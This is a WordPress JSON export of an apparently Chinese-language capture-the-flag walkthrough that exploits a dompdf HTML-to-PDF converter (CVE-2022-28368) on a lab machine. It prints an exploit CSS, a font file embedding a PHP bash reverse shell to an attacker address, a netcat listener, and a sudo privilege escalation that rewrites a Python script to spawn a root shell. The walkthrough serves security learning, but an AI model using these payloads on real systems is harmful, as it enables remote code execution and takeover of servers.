{"id":158,"date":"2024-04-15T22:48:18","date_gmt":"2024-04-15T14:48:18","guid":{"rendered":"http:\/\/xiyu12.top\/?p=158"},"modified":"2024-04-15T22:48:18","modified_gmt":"2024-04-15T14:48:18","slug":"convert","status":"publish","type":"post","link":"http:\/\/www.xiyu12.top\/?p=158","title":{"rendered":"convert"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">\u76f4\u63a5\u8fdb\u5165web http:\/\/192.168.56.10\/index.php  \u53d1\u73b0\u4e00\u4e2a\u8f93\u5165 url\u7684\u5730\u65b9  <\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8f93\u5165 http:\/\/192.168.56.5  \u62a5\u9519<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-15-222843-1024x356.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-15-222843-1024x356.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-162\" style=\"width:840px;height:auto\"\/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-15-222528-1024x146.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-15-222528-1024x146.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-159\"\/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-15-222611-1024x406.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-15-222611-1024x406.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-160\"\/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-15-222653-1024x439.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-15-222653-1024x439.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-161\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">dompdf\u662f\u4e00\u4e2a\u6d41\u884c\u7684PHP\u5e93\uff0c\u7528\u4e8e\u5c06HTML\u6587\u6863\u6216\u5b57\u7b26\u4e32\u8f6c\u6362\u4e3aPDF\u683c\u5f0f\u3002\u5b83\u4f7f\u7528PHP\u7684DOM\u6269\u5c55\u6765\u89e3\u6790HTML\uff0c\u7136\u540e\u5e94\u7528CSS\u6837\u5f0f\u6765\u751f\u6210PDF\u3002dompdf\u63d0\u4f9b\u4e86\u4e00\u4e2a\u7b80\u5355\u6613\u7528\u7684A.PI\uff0c\u5141\u8bb8\u5f00\u53d1\u8005\u8f7b\u677e\u5730\u5c06\u7f51\u9875\u5185\u5bb9\u8f6c\u6362\u4e3aPDF\u6587\u4ef6\uff0c\u800c\u65e0\u9700\u4f9d\u8d56\u4e8e\u50cfwkhtmltopdf\u8fd9\u6837\u7684\u5916\u90e8\u5de5\u5177\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f7f\u7528 python3 -m http.server 8000  \u5f00\u542f\u4e00\u4e2a\u670d\u52a1\u5668  <\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8bbf\u95ee http:\/\/192.168.56.10:8000  \u53d1\u73b0\u53ef\u4ee5 \u5c06\u7f51\u9875\u8f6c\u6362\u4e3a pdf<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5728 github \u67e5\u627e\u76f8\u5173\u6f0f\u6d1e   <a href=\"https:\/\/github.com\/positive-security\/dompdf-rce\">https:\/\/github.com\/positive-security\/dompdf-rce<\/a><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/overview-1024x433.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"433\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/overview-1024x433.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-163\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/github.com\/rvizx\/CVE-2022-28368\/tree\/main\">rvizx\/CVE-2022-28368\uff1aDompdf RCE PoC \u6f0f\u6d1e &#8211; CVE-2022-28368 (github.com)<\/a><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>git clone https:\/\/github.com\/rvizx\/CVE-2022-28368\ncd  CVE-2022-28368\npython3 dompdf-rce.py --inject http:\/\/192.168.56.10?url= --dompdf http:\/\/192.168.56.5\/dompdf\ncat exploit.css  \n--------------------------------------------------------------------\n@font-face {\n    font-family:'exploitfont';\n    src:url('http:\/\/192.168.56.5:9001\/exploit_font.php');\n    font-weight:'normal';\n    font-style:'normal';\n}\n-----------------------------------------------------------------\ncat exploit_font.php \n\n\ufffd dum1\ufffdcmap\n           `\ufffd,glyf5sc\ufffd\ufffdhead\ufffdQ6\ufffd6hhea\ufffd\ufffd($hmtxD\n                           s\n&lt;?php exec(\"\/bin\/bash -c 'bash -i >&amp; \/dev\/tcp\/192.168.56.5\/9002 0>&amp;1'\");?> \n-------------------------------------------------------------------------\ncat 1.html     \n&lt;link rel=stylesheet href='http:\/\/192.168.56.5:8000\/exploit.css'>\n------------------------------------------------------------------------\necho -n http:\/\/192.168.56.5:9001\/exploit_font.php | md5sum  \n--------------------------------------------------------------------\ncurl http:\/\/192.168.56.10\/dompdf\/lib\/fonts\/exploitfont_normal_4f02072679171059c81a52e903b4c1cc.php\n<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>python3 -m http.server 9001\npython3 -m http.server 8000\nsudo nc -lvp 9002<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>\u8bfb\u53d6 root.txt\nsudo \/usr\/bin\/python3 \/home\/eva\/pdfgen.py  -U \/root\/root.txt -O \/var\/www\/html\/root.pdf\n<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>rm pdfgen.py  #\u5220\u9664\u539f\u6587\u4ef6\necho 'import os'>pdfgen.py  #\u65b0\u5efa\u4e00\u4e2a\necho 'os.system(\"\/bin\/bash\")'>>pdfgen.py\nsudo \/usr\/bin\/python3 \/home\/eva\/pdfgen.py 1  #\u6267\u884c\u83b7\u5f97root\n\u539f\u7406\uff1a \u5728\u5bb6\u76ee\u5f55 \u7528\u6237\u53ef\u4ee5\u5904\u7406\u6240\u6709\u6587\u4ef6\n\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>\u76f4\u63a5\u8fdb\u5165web http:\/\/192.168.56.10\/index.php \u53d1\u73b0\u4e00\u4e2a\u8f93\u5165 url\u7684\u5730\u65b9 \u8f93\u5165 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[37,60,70],"class_list":["post-158","post","type-post","status-publish","format-standard","hentry","category-target-aircraft","tag-html-to-pdf","tag-php","tag-python"],"_links":{"self":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/158","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=158"}],"version-history":[{"count":0,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/158\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=158"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=158"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=158"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}